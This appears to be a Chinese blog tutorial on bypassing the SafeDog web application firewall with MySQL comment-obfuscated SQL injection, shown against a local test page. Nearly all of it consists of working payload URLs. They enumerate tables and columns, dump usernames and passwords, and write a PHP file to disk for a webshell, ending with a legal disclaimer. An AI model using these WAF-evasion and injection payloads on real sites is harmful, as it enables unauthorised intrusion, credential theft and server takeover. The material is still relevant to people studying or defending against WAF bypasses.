绕过安全狗_绕过安全狗五步法

今天分享绕过安全狗的方法,各位帽子兄弟研阅。

PS:测试请断网,据说log会上传,哈哈

熟悉的页面,没错绕过它,核心方法:Mysql注释绕过

55da76b7583ef637eaa08d9c53a1823c.png

环境:

5a3cc3f33f31222d29437f9a653ea7bb.png

c83dca32230bd3b813ebc3ed893aa95f.png

e406aa81a91056a1a5e7801279af1d1f.png

001 利用数据回显获取用户信息

找出回显字段

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)

6c7cc02c55838e84de4d10be91b329b6.png

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))

4dd2987f956ecb5d8d81a5189583e8b3.png

002 获取当前表名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))

2d4354c1ff204ed881d660d69d4e2fd5.png

003 获取当前表的所有列名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)

4371bbb0e3858ba16b82654552734d42.png

004 获取当前表的数据

http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password) from/*!`users`*/)

a25d259292a9ac80a9e71771cd7e138d.png

005 Getshell

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)

89f73b99c9b0ffa31242f063e010b1c1.png

178919a819a81f60109d560618a9b337.png

法律声明:本文仅供参考,希望能对大家提高网络安全意识有所帮助,若需转载请注明出处.